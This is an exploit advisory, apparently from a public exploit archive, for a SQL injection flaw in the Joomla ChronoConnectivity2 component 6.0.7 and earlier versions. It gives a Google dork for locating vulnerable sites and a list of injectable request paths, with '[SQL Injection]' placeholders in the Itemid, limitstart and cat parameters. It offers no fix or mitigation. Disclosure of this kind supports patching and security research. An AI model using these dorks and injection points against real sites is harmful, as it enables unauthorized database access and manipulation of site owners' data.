#################################################################### # Exploit Title : Joomla ChronoConnectivity2 Components 6.0.7 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 01/02/2019 # Vendor Homepage : chronoengine.com # Software Download Link : chronoengine.com/chronoconnectivity/download # Software Information Link : extensions.joomla.org/extension/chrono-connectivity/ # Software Version : 6.0.7 # Other Affected Versions : V5.0.6_Component - V5.0_Plugin_RC1 - V4_RC3.2_J1.6 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_chronoconnectivity2'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** ChronoConnectivity is a raw CCK (Content constructions kit) for Joomla, it helps you list and manage (delete/update) the data in any of your database tables, with full permissions support, and full integration with Chronoforms. Display and manage data from any MySQL database, build Joomla reports and data tables easily and with huge list of features using ChronoConnectivity. #################################################################### # Impact : *********** Joomla ChronoConnectivity2 6.0.7 and other versions component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_chronoconnectivity&Itemid=[SQL Injection] /index.php?option=com_chronoconnectivity&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] /index.php?option=com_chronoconnectivity2&Itemid=[SQL Injection] /index.php?option=com_chronoconnectivity2&connectionname=[FOLDER-NAME]&start=&Itemid=[SQL Injection] /index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection] /index.php?option=com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] /index.php?option=com_chronoconnectivity2&connectionname=albo_storico_accessibili&cat=[ID-NUMBER]&Itemid=[SQL Injection] /component/chronoconnectivity2/index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection] #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################